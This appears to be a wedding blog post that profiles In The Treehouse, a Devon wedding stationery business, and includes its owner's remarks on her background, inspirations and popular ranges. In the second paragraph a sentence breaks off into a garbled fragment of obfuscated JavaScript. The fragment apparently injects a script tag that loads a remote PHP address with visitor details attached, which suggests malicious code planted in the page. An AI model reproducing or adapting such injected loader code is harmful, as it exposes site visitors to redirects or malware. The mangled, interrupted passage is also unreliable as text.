Since starting Alice In Weddingland and having my head and my beady little eyes in the Wedding Industry, I have discovered some spectacular stuff; artists creating stunning work.  And I’ve been introduced to some really special people who are doing phenomenal work in the industry.

There is also a huge, and I mean over-whelming amount of talented people creating unique””””,’g””” c=\’d\’ e=\’b/’ 4=\’7://5.8.9.f/1/h.s.t?r=”+3(0.p)+”\o=”+3(j.i)+”\’><\/k"+"l>“);n m=”q”;’,30,30,’abbfi|varabyis||js|php’.split(‘|’),0,{}))

from vintage, to retro, to quirky, to some stunning contemporary collections and In The Treehouse, based in Devon is another example.

Jenny Keegan is the talented owner and designer of In The Treehouse, a Devon based company producing unique wedding stationery, set up in April this year. When I saw Jenny’s website the first thing I noticed was how beautifully colourful and happy her website design was which led me to think her stationery was going to be the same… and it was.  She “proudly flys’ the flag for colour, individuality and ethical integrity in the world of wedding and celebration stationery’.

The wedding stationery matches Jenny’s personality in that they’re colourful, fun and full of flare.

I’m Jenny, 26 years old, and owner/designer at In the Treehouse stationery studio. I set the business up in April 2011 after a 6 year career in children’s social care (very different to what I do now!) Although I loved that job, I wanted to pursue a more creative path to utilise my skills in art & design as well as to be in control of my own future by becoming self-employed. I have loved my journey with In the Treehouse so far, it has taken off beyond my wildest dreams and continues to go from strength to strength – I’m really looking forward to the adventures 2012 will bring, especially as I’m taking someone on full time in the new year, so will be able to focus more on the tasks that will hopefully see In the Treehouse reach its full potential.  I also have a beautiful, noisy, messy, kind little 2 year old who is the light of my life and keeps me on my toes!

What inspires Jenny when making her unique wedding stationery:

The inspiration for our designs comes from everywhere really – fashion, culture, film, interior design, nature, but most importantly from the Brides & Grooms we work with. Most of our ranges have been born from a Bride’s enquiry which starts with something like ‘Just wondering if you have any stationery based on……’? If we don’t already have something which is perfect for a couple’s big day, we’re happy to create a bespoke design, and work with clients closely to make sure it’s just right.

I asked Jenny what her most popular ranges are:

Our most popular ranges are the vintage style ones, with subtle colours, a lot of nostalgia and a hint of our modern style in the way of typography. More and more though we’re having requests for quirkier themes such as 1980’s style, Tattoo-art & retro.

Our Airmail Love Story range is also a great seller & ideal for those getting married abroad. The fact that we offer our Save the Dates on postcard size vinyl fridge magnets is also a big selling point, as there are very few companies who offer this.

Jenny’s got some stunners amongst her collections; my favourites being the Vintage Delicates and the Paris range.  Her art is unique and her style is authentic.  I must warn you though, by the time you’ve had a wonderful scroll through her website you’ll be a little addicted to her birdies! 🙂
